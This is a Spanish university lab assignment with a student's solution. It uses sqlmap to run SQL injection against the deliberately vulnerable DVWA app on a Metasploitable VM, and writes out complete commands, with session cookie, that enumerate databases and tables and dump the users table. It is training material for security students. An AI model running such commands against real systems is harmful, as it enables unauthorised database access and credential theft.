Anda di halaman 1dari 8

Asignatura Datos del alumno Fecha

Apellidos:
Análisis de
vulnerabilidades
Nombre:

Actividades

Trabajo: Realizar ataques SQL Injection contra la aplicación


DVWA

En la siguiente actividad deberás realizar diversos ataques sobre la aplicación DVWA


utilizando la técnica de SQL injection.

Para ello, debes utilizar la herramienta SQLMap (instalada en Kali por defecto).

Se valorará positivamente que expliques debidamente los pasos seguidos para la


realización de cada ataque.

Tendrás que:

» Indicar cuál/cuáles son los parámetros vulnerables de la URL.


» Obtener los nombres de las bases de datos disponibles.
» Recuperar los nombres de las tablas de la base de datos dvwa.
» Recuperar el contenido de las tablas de la base de datos dvwa.

Extensión máxima: 10 páginas (Georgia 11 e interlineado 1,5).

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)


Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:

Solución

Para el desarrollo de la solución utilizaremos un entorno virtual con dos máquinas


virtuales, siendo la primera la maquina victima (Metasploitable) ya que tiene
configurada la aplicación DVWA y como maquina atacante (Kali Linux) la misma que
tiene instalado SQLMAP.

Primero comprobamos que tanto la maquina atacante como la victima estén en la misma
red.

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)


Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:

Desde la maquina atacante accedemos a un navegador web de preferencia Firefox y


digitamos la direccion de la maquina victima para el caso 192.168.2.16 y seleccionamos
la aplicación DVWA.

Se mostrara la siguiente pantalla las credenciales por defecto son:


Usurio: admin
Password: password

Prepararemos el nivel de seguridad de la plataforma DVWA, para facilitar el entorno de


ataque situándolo en seguridad baja.

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)


Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:

Indicar cuál/cuáles son los parámetros vulnerables de la


URL.
Para identificar los parámetros vulnerables de la URL hacemos clic en el menú lateral
en la opción “SQL Ijection” y seguidamente en el botón Submit.

Al hacer clic en el botón Submit nuestra URL cambia ya que utiliza el metodo GET
para obtener la información ingresada y muestra el parametro vulnerable “id”

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)


Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:

Obtener los nombres de las bases de datos disponibles.


Con la ayuda del complemento de Firefox “Http Header Live” obtenemos el User-Agent
y las Cookies necesarios para utilizar SQLMap.

Una vez obtenidos los datos anteriores

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0


Cookie: security=low; PHPSESSID=a4b159de41451243956c86cb3371bc77

Con el siguiente comando podemos obtener los nombres de las bases de datos
disponibles.

sqlmap --headers=” Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101


Firefox/61.0” --cookie=” security=low;
PHPSESSID=a4b159de41451243956c86cb3371bc77” -u
"http://192.168.2.16/dvwa/vulnerabilities/sqli/?id=1-BR&Submit=Submit#" --dbs

Al finalizar la ejecución nos mostrara información sobre el sistema operativo, motor de


base de datos y la lista de bases disponibles.

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)


Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:

Recuperar los nombres de las tablas de la base de datos


dvwa.
Para recuperar las tablas de la base de datos dvwa al comando utilizado en el punto
anterior le cambiamos ciertos parámetros

sqlmap --headers=” Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101


Firefox/61.0” --cookie=” security=low;
PHPSESSID=a4b159de41451243956c86cb3371bc77” -u
"http://192.168.2.16/dvwa/vulnerabilities/sqli/?id=1-BR&Submit=Submit#"
-D dvwa --tables

Al finalizar la ejecución nos retorna la información que necesitamos.

Recuperar el contenido de las tablas de la base de datos


dvwa.
De similar forma para este punto cambiaremos parte del comando del punto 1
agregando los parámetros que se muestran a continuación.

Tabla guestbook
sqlmap --headers=” Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101
Firefox/61.0” --cookie=” security=low;
PHPSESSID=a4b159de41451243956c86cb3371bc77” -u
"http://192.168.2.16/dvwa/vulnerabilities/sqli/?id=1-BR&Submit=Submit#"
--dump --batch -T guestbook -D dvwa

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)


Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:

Esperamos que finalice la ejecucion de la instrucción nos retorna.

Tabla users
sqlmap --headers=” Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101
Firefox/61.0” --cookie=” security=low;
PHPSESSID=a4b159de41451243956c86cb3371bc77” -u
"http://192.168.2.16/dvwa/vulnerabilities/sqli/?id=1-BR&Submit=Submit#"
--dump --batch -T users -D dvwa

Al finalizar nos retorna la tabla con los datos de los usuarios como se muestra a
continuación.

Verificación de usuarios obtenidos.

Utilizamos uno de los usuarios obtenidos en el punto anterior en la pantalla de login de


la aplicación.

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)


Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:

Parámetros SQLMap utilizados

-- headers Encabezados adicionales


-- cookie Valor del encabezado http cookie
-- dbs Enumerar bases de datos DBMS
-D Base de datos DBMS para enumerar
-- tables Enumerar tablas de base de datos DBMS
-- dump Volcado de DBMS
-- batch Nunca solicite la entrada del usuario, usar predeterminado
-T Tabla (s) de base de datos DBMS para enumerar

TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)

Anda mungkin juga menyukai